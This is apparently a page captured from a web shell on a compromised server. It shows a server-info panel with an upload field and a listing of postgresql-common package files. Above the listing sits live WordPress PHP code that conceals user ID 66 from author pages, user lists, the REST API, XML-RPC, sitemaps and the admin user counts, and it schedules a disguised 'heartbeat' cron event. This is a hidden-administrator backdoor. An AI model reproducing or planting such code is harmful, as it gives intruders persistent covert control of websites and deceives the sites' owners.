add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 66; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 66 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 66 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 66; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 66; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/66(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } );
| Server IP : 167.235.224.122 / Your IP : 216.73.216.110 Web Server : Apache/2.4.58 (Ubuntu) System : Linux newplayground 6.8.0-136-generic #136-Ubuntu SMP PREEMPT_DYNAMIC Wed Jul 1 21:33:11 UTC 2026 aarch64 User : deploy ( 1000) PHP Version : 8.4.23 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF | Sudo : ON | Pkexec : OFF Directory : /var/lib/dpkg/info/ |
Upload File : |
/. /etc /etc/init.d /etc/init.d/postgresql /etc/logrotate.d /etc/logrotate.d/postgresql-common /etc/postgresql /etc/postgresql-common /etc/postgresql-common/pg_upgradecluster.d /etc/postgresql-common/pg_upgradecluster.d/analyze /usr /usr/bin /usr/bin/pg_backupcluster /usr/bin/pg_buildext /usr/bin/pg_config /usr/bin/pg_conftool /usr/bin/pg_createcluster /usr/bin/pg_ctlcluster /usr/bin/pg_dropcluster /usr/bin/pg_lsclusters /usr/bin/pg_renamecluster /usr/bin/pg_restorecluster /usr/bin/pg_upgradecluster /usr/bin/pg_virtualenv /usr/lib /usr/lib/systemd /usr/lib/systemd/system /usr/lib/systemd/system/pg_basebackup@.service /usr/lib/systemd/system/pg_basebackup@.timer /usr/lib/systemd/system/pg_compresswal@.service /usr/lib/systemd/system/pg_compresswal@.timer /usr/lib/systemd/system/pg_dump@.service /usr/lib/systemd/system/pg_dump@.timer /usr/lib/systemd/system/pg_receivewal@.service /usr/lib/systemd/system/postgresql.service /usr/lib/systemd/system/postgresql@.service /usr/lib/systemd/system-generators /usr/lib/systemd/system-generators/postgresql-generator /usr/lib/tmpfiles.d /usr/lib/tmpfiles.d/postgresql-common.conf /usr/sbin /usr/sbin/pg_updatedicts /usr/share /usr/share/doc /usr/share/doc/postgresql-common /usr/share/doc/postgresql-common/README.Debian.gz /usr/share/doc/postgresql-common/README.md.gz /usr/share/doc/postgresql-common/README.systemd /usr/share/doc/postgresql-common/copyright /usr/share/doc/postgresql-common/dependencies.svg /usr/share/lintian /usr/share/lintian/overrides /usr/share/lintian/overrides/postgresql-common /usr/share/man /usr/share/man/man1 /usr/share/man/man1/pg_backupcluster.1.gz /usr/share/man/man1/pg_buildext.1.gz /usr/share/man/man1/pg_conftool.1.gz /usr/share/man/man1/pg_createcluster.1.gz /usr/share/man/man1/pg_ctlcluster.1.gz /usr/share/man/man1/pg_dropcluster.1.gz /usr/share/man/man1/pg_getwal.1.gz /usr/share/man/man1/pg_lsclusters.1.gz /usr/share/man/man1/pg_renamecluster.1.gz /usr/share/man/man1/pg_restorecluster.1.gz /usr/share/man/man1/pg_upgradecluster.1.gz /usr/share/man/man1/pg_virtualenv.1.gz /usr/share/man/man8 /usr/share/man/man8/pg_updatedicts.8.gz /usr/share/postgresql-common /usr/share/postgresql-common/createcluster.conf /usr/share/postgresql-common/init.d-functions /usr/share/postgresql-common/pg_checksystem /usr/share/postgresql-common/pg_getwal /usr/share/postgresql-common/pg_updateaptconfig /usr/share/postgresql-common/pgdg /usr/share/postgresql-common/pgdg/apt.postgresql.org.asc /usr/share/postgresql-common/pgdg/apt.postgresql.org.gpg /usr/share/postgresql-common/pgdg/apt.postgresql.org.sh /usr/share/postgresql-common/server /usr/share/postgresql-common/server/README /usr/share/postgresql-common/server/catversion /usr/share/postgresql-common/server/pg_config.pl /usr/share/postgresql-common/server/postgresql.mk /usr/share/postgresql-common/server/test-with-jit.conf /usr/share/postgresql-common/t /usr/share/postgresql-common/t/001_packages.t /usr/share/postgresql-common/t/002_existing_clusters.t /usr/share/postgresql-common/t/003_alternatives.t /usr/share/postgresql-common/t/005_PgCommon.t /usr/share/postgresql-common/t/006_next_free_port.t /usr/share/postgresql-common/t/007_pg_conftool.t /usr/share/postgresql-common/t/010_defaultport_cluster.t /usr/share/postgresql-common/t/015_start_stop.t /usr/share/postgresql-common/t/020_create_sql_remove.t /usr/share/postgresql-common/t/021_pg_renamecluster.t /usr/share/postgresql-common/t/022_recovery.t /usr/share/postgresql-common/t/025_logging.t /usr/share/postgresql-common/t/030_errors.t /usr/share/postgresql-common/t/031_errors_disk_full.t /usr/share/postgresql-common/t/032_ssl_key_permissions.t /usr/share/postgresql-common/t/040_upgrade.t /usr/share/postgresql-common/t/041_upgrade_custompaths.t /usr/share/postgresql-common/t/042_upgrade_rename.t /usr/share/postgresql-common/t/043_upgrade_ssl_cert.t /usr/share/postgresql-common/t/045_backup.t /usr/share/postgresql-common/t/050_encodings.t /usr/share/postgresql-common/t/052_upgrade_encodings.t /usr/share/postgresql-common/t/060_obsolete_confparams.t /usr/share/postgresql-common/t/070_non_postgres_clusters.t /usr/share/postgresql-common/t/080_start.conf.t /usr/share/postgresql-common/t/085_pg_ctl.conf.t /usr/share/postgresql-common/t/090_multicluster.t /usr/share/postgresql-common/t/110_integrate_cluster.t /usr/share/postgresql-common/t/120_pg_upgradecluster_scripts.t /usr/share/postgresql-common/t/130_nonroot_admin.t /usr/share/postgresql-common/t/135_pg_virtualenv.t /usr/share/postgresql-common/t/140_pg_config.t /usr/share/postgresql-common/t/150_tsearch_stemming.t /usr/share/postgresql-common/t/160_alternate_confroot.t /usr/share/postgresql-common/t/170_extensions.t /usr/share/postgresql-common/t/180_ecpg.t /usr/share/postgresql-common/t/190_pg_buildext.t /usr/share/postgresql-common/t/200_maintscripts.t /usr/share/postgresql-common/t/TestLib.pm /usr/share/postgresql-common/t/bar /usr/share/postgresql-common/t/bar/debian /usr/share/postgresql-common/t/bar/debian/control.in /usr/share/postgresql-common/t/bar/debian/pgversions /usr/share/postgresql-common/t/foo /usr/share/postgresql-common/t/foo/Makefile /usr/share/postgresql-common/t/foo/foo-123 /usr/share/postgresql-common/t/foo/foo-123/Makefile /usr/share/postgresql-common/t/foo/foo-123/README.md /usr/share/postgresql-common/t/foo/foo-123/expected /usr/share/postgresql-common/t/foo/foo-123/expected/foo.out /usr/share/postgresql-common/t/foo/foo-123/expected/upgrade.out /usr/share/postgresql-common/t/foo/foo-123/foo--100--123.sql /usr/share/postgresql-common/t/foo/foo-123/foo--100.sql /usr/share/postgresql-common/t/foo/foo-123/foo--123.sql /usr/share/postgresql-common/t/foo/foo-123/foo.c /usr/share/postgresql-common/t/foo/foo-123/foo.control /usr/share/postgresql-common/t/foo/foo-123/sql /usr/share/postgresql-common/t/foo/foo-123/sql/foo.sql /usr/share/postgresql-common/t/foo/foo-123/sql/upgrade.sql /usr/share/postgresql-common/t/template /usr/share/postgresql-common/testsuite /var /var/lib /var/lib/postgresql /var/log /var/log/postgresql /usr/bin/pg_archivecleanup /usr/share/doc/postgresql-common/changelog.gz